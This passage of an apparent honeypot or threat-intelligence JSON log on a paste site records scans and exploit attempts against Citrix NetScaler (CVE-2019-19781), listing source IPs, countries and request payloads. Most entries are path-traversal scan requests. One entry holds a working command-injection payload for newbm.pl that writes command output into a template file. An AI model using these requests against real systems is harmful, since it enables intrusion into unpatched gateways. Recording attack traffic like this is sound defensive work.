  755.       "tags": [
  756.         {
  757.           "cve": "CVE-2019-19781",
  758.           "category": "Platform",
  759.           "description": "Citrix NetScaler Gateway Exploit"
  760.         }
  761.       ],
  762.       "event_count": 2,
  763.       "first_seen": "2020-01-12T07:50:59Z",
  764.       "last_seen": "2020-01-12T07:50:59Z"
  765.     },
  766.     {
  767.       "source_ip_address": "156.17.191.239",
  768.       "country": "PL",
  769.       "user_agent": "curl/7.52.1",
  770.       "payload": "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1",
  771.       "post_data": "\"url=https://example.com\\x5C&title=[% template.new({'BLOCK'='exec(\\x5C'uname -a | tee /netscaler/portal/templates/8Zy8VgjuOS2PGMp5adl52pIRQfCwL0A7.xml\\x5C');'}) %]\\x5C&desc=test\\x5C&UI_inuse=RfWeb\"",
  772.       "target_port": 443,
  773.       "protocol": "tcp",
  774.       "tags": [
  775.         {
  776.           "cve": "CVE-2019-19781",
  777.           "category": "Platform",
  778.           "description": "Citrix NetScaler Gateway Exploit"
  779.         }
  780.       ],
  781.       "event_count": 1,
  782.       "first_seen": "2020-01-12T07:50:58Z",
  783.       "last_seen": "2020-01-12T07:50:58Z"
  784.     },
  785.     {
  786.       "source_ip_address": "5.129.216.29",
  787.       "country": "RU",
  788.       "user_agent": "Mozilla/5.0",
  789.       "payload": "GET /vpns/cfg/smb.conf HTTP/1.0",
  790.       "post_data": "",
  791.       "target_port": 80,
  792.       "protocol": "tcp",
  793.       "tags": [
  794.         {
  795.           "cve": "CVE-2019-19781",
  796.           "category": "Platform",
  797.           "description": "Citrix NetScaler Gateway Scan"
  798.         }
  799.       ],
  800.       "event_count": 1,
  801.       "first_seen": "2020-01-12T07:03:45Z",
  802.       "last_seen": "2020-01-12T07:03:45Z"
  803.     },
  804.     {
  805.       "source_ip_address": "78.41.182.12",
  806.       "country": "RU",
  807.       "user_agent": "Mozilla/5.0",
  808.       "payload": "GET /vpns/cfg/smb.conf HTTP/1.0",
  809.       "post_data": "",
  810.       "target_port": 80,
  811.       "protocol": "tcp",
  812.       "tags": [
  813.         {
  814.           "cve": "CVE-2019-19781",
  815.           "category": "Platform",
  816.           "description": "Citrix NetScaler Gateway Scan"
  817.         }
  818.       ],
  819.       "event_count": 1,
  820.       "first_seen": "2020-01-12T06:59:10Z",
  821.       "last_seen": "2020-01-12T06:59:10Z"
  822.     },
  823.     {
  824.       "source_ip_address": "85.93.137.133",
  825.       "country": "RU",
  826.       "user_agent": "Mozilla/5.0",
  827.       "payload": "GET /vpns/cfg/smb.conf HTTP/1.0",
  828.       "post_data": "",
  829.       "target_port": 80,
  830.       "protocol": "tcp",
  831.       "tags": [
  832.         {
  833.           "cve": "CVE-2019-19781",
  834.           "category": "Platform",
  835.           "description": "Citrix NetScaler Gateway Scan"
  836.         }
  837.       ],
  838.       "event_count": 2,
  839.       "first_seen": "2020-01-12T06:53:05Z",
  840.       "last_seen": "2020-01-12T06:53:05Z"
  841.     },
  842.     {
  843.       "source_ip_address": "95.221.163.206",
  844.       "country": "RU",
  845.       "user_agent": "Mozilla/5.0",
  846.       "payload": "GET /vpns/ HTTP/1.0",
  847.       "post_data": "",
  848.       "target_port": 80,
  849.       "protocol": "tcp",
  850.       "tags": [
  851.         {
  852.           "cve": "CVE-2019-19781",
  853.           "category": "Platform",
  854.           "description": "Possible Citrix NetScaler Gateway Scan"
  855.         }
  856.       ],
  857.       "event_count": 2,
  858.       "first_seen": "2020-01-11T08:31:17Z",
  859.       "last_seen": "2020-01-11T08:31:17Z"
  860.     },
  861.     {
  862.       "source_ip_address": "194.190.64.90",
  863.       "country": "RU",
  864.       "user_agent": "Mozilla/5.0",
  865.       "payload": "GET /vpns/ HTTP/1.0",
  866.       "post_data": "",
  867.       "target_port": 80,
  868.       "protocol": "tcp",
  869.       "tags": [
  870.         {
  871.           "cve": "CVE-2019-19781",
  872.           "category": "Platform",
  873.           "description": "Possible Citrix NetScaler Gateway Scan"
  874.         }
  875.       ],
  876.       "event_count": 1,
  877.       "first_seen": "2020-01-11T08:29:34Z",
  878.       "last_seen": "2020-01-11T08:29:34Z"
  879.     },
  880.     {
  881.       "source_ip_address": "172.105.64.188",
  882.       "country": "DE",
  883.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
  884.       "payload": "GET /vpn/../vpns/ HTTP/1.1",
  885.       "post_data": "",
  886.       "target_port": 443,
  887.       "protocol": "tcp",
  888.       "tags": [
  889.         {
  890.           "cve": "CVE-2019-19781",
  891.           "category": "Platform",
  892.           "description": "Citrix NetScaler Gateway Scan"
  893.         }
  894.       ],
  895.       "event_count": 284,
  896.       "first_seen": "2020-01-09T21:28:04Z",
  897.       "last_seen": "2020-01-10T10:31:56Z"
  898.     },
  899.     {
  900.       "source_ip_address": "157.245.226.196",
  901.       "country": "US",
  902.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
  903.       "payload": "GET /vpn/../vpns/ HTTP/1.1",
  904.       "post_data": "",
  905.       "target_port": 443,
  906.       "protocol": "tcp",
  907.       "tags": [
  908.         {
  909.           "cve": "CVE-2019-19781",
  910.           "category": "Platform",
  911.           "description": "Citrix NetScaler Gateway Scan"
  912.         }
  913.       ],
  914.       "event_count": 1,
  915.       "first_seen": "2020-01-10T03:08:58Z",
  916.       "last_seen": "2020-01-10T03:08:58Z"
  917.     },
  918.     {
  919.       "source_ip_address": "85.90.247.110",
  920.       "country": "DE",
  921.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
  922.       "payload": "GET /vpn/../vpns/ HTTP/1.1",
  923.       "post_data": "",
  924.       "target_port": 443,
  925.       "protocol": "tcp",
  926.       "tags": [
  927.         {
  928.           "cve": "CVE-2019-19781",
  929.           "category": "Platform",
  930.           "description": "Citrix NetScaler Gateway Scan"
  931.         }
  932.       ],
  933.       "event_count": 5,
  934.       "first_seen": "2020-01-09T21:58:10Z",
  935.       "last_seen": "2020-01-09T23:51:36Z"
  936.     },
  937.     {
  938.       "source_ip_address": "139.162.189.189",
  939.       "country": "DE",
  940.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
  941.       "payload": "GET /vpn/../vpns/ HTTP/1.1",
  942.       "post_data": "",
  943.       "target_port": 443,
  944.       "protocol": "tcp",
  945.       "tags": [
  946.         {
  947.           "cve": "CVE-2019-19781",
  948.           "category": "Platform",
  949.           "description": "Citrix NetScaler Gateway Scan"
  950.         }
  951.       ],
  952.       "event_count": 4,
  953.       "first_seen": "2020-01-09T17:46:04Z",
  954.       "last_seen": "2020-01-09T23:48:08Z"
  955.     },
  956.     {
  957.       "source_ip_address": "173.255.200.120",
  958.       "country": "US",
  959.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
  960.       "payload": "GET /vpn/../vpns/ HTTP/1.1",
  961.       "post_data": "",
  962.       "target_port": 443,
  963.       "protocol": "tcp",
  964.       "tags": [
  965.         {
  966.           "cve": "CVE-2019-19781",
  967.           "category": "Platform",
  968.           "description": "Citrix NetScaler Gateway Scan"
  969.         }
  970.       ],
  971.       "event_count": 321,
  972.       "first_seen": "2020-01-09T15:27:14Z",
  973.       "last_seen": "2020-01-09T23:24:09Z"
  974.     },
  975.     {
  976.       "source_ip_address": "45.79.129.215",
  977.       "country": "US",
  978.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
  979.       "payload": "GET /vpn/../vpns/ HTTP/1.1",
  980.       "post_data": "",
  981.       "target_port": 443,
  982.       "protocol": "tcp",
  983.       "tags": [
  984.         {
  985.           "cve": "CVE-2019-19781",
  986.           "category": "Platform",
  987.           "description": "Citrix NetScaler Gateway Scan"
  988.         }
  989.       ],
  990.       "event_count": 2,
  991.       "first_seen": "2020-01-09T21:43:56Z",
  992.       "last_seen": "2020-01-09T21:43:56Z"
  993.     },
  994.     {
  995.       "source_ip_address": "172.104.210.59",
  996.       "country": "US",
  997.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
  998.       "payload": "GET /vpn/../vpns/ HTTP/1.1",
  999.       "post_data": "",
  1000.       "target_port": 443,
  1001.       "protocol": "tcp",
  1002.       "tags": [
  1003.         {
  1004.           "cve": "CVE-2019-19781",
  1005.           "category": "Platform",
  1006.           "description": "Citrix NetScaler Gateway Scan"
  1007.         }
  1008.       ],
  1009.       "event_count": 1,
  1010.       "first_seen": "2020-01-09T20:13:04Z",
  1011.       "last_seen": "2020-01-09T20:13:04Z"
  1012.     },
  1013.     {
  1014.       "source_ip_address": "139.59.212.187",
  1015.       "country": "DE",
  1016.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
  1017.       "payload": "GET /vpn/../vpns/ HTTP/1.1",
  1018.       "post_data": "",
  1019.       "target_port": 443,
  1020.       "protocol": "tcp",
  1021.       "tags": [
  1022.         {
  1023.           "cve": "CVE-2019-19781",
  1024.           "category": "Platform",
  1025.           "description": "Citrix NetScaler Gateway Scan"
  1026.         }
  1027.       ],
  1028.       "event_count": 16,
  1029.       "first_seen": "2020-01-09T16:21:44Z",
  1030.       "last_seen": "2020-01-09T20:09:27Z"
  1031.     },
  1032.     {
  1033.       "source_ip_address": "69.164.202.142",
  1034.       "country": "US",
  1035.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
  1036.       "payload": "GET /vpn/../vpns/ HTTP/1.1",
  1037.       "post_data": "",
  1038.       "target_port": 443,
  1039.       "protocol": "tcp",
  1040.       "tags": [
  1041.         {
  1042.           "cve": "CVE-2019-19781",
  1043.           "category": "Platform",
  1044.           "description": "Citrix NetScaler Gateway Scan"
  1045.         }
  1046.       ],
  1047.       "event_count": 1,
  1048.       "first_seen": "2020-01-09T19:45:08Z",
  1049.       "last_seen": "2020-01-09T19:45:08Z"
  1050.     },
  1051.     {
  1052.       "source_ip_address": "45.79.29.24",
  1053.       "country": "US",
  1054.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
  1055.       "payload": "GET /vpn/../vpns/ HTTP/1.1",
  1056.       "post_data": "",
  1057.       "target_port": 443,
  1058.       "protocol": "tcp",
  1059.       "tags": [
  1060.         {
  1061.           "cve": "CVE-2019-19781",
  1062.           "category": "Platform",
  1063.           "description": "Citrix NetScaler Gateway Scan"
  1064.         }
  1065.       ],
  1066.       "event_count": 5,
  1067.       "first_seen": "2020-01-09T19:23:01Z",
  1068.       "last_seen": "2020-01-09T19:23:01Z"
  1069.     },
  1070.     {
  1071.       "source_ip_address": "45.33.92.155",
  1072.       "country": "US",
  1073.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
  1074.       "payload": "GET /vpn/../vpns/ HTTP/1.1",
  1075.       "post_data": "",
  1076.       "target_port": 443,
  1077.       "protocol": "tcp",
  1078.       "tags": [
  1079.         {
  1080.           "cve": "CVE-2019-19781",
  1081.           "category": "Platform",
  1082.           "description": "Citrix NetScaler Gateway Scan"
  1083.         }
  1084.       ],
  1085.       "event_count": 156,
  1086.       "first_seen": "2020-01-09T16:43:03Z",
  1087.       "last_seen": "2020-01-09T16:43:03Z"
  1088.     },
  1089.     {
  1090.       "source_ip_address": "142.93.150.124",
  1091.       "country": "CA",
  1092.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
  1093.       "payload": "GET /vpn/../vpns/ HTTP/1.1",
  1094.       "post_data": "",
  1095.       "target_port": 443,
  1096.       "protocol": "tcp",
  1097.       "tags": [
  1098.         {
  1099.           "cve": "CVE-2019-19781",
  1100.           "category": "Platform",
  1101.           "description": "Citrix NetScaler Gateway Scan"
  1102.         }
  1103.       ],
  1104.       "event_count": 8,
  1105.       "first_seen": "2020-01-09T16:21:38Z",
  1106.       "last_seen": "2020-01-09T16:21:38Z"
  1107.     }
  1108.   ]
  1109. }
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!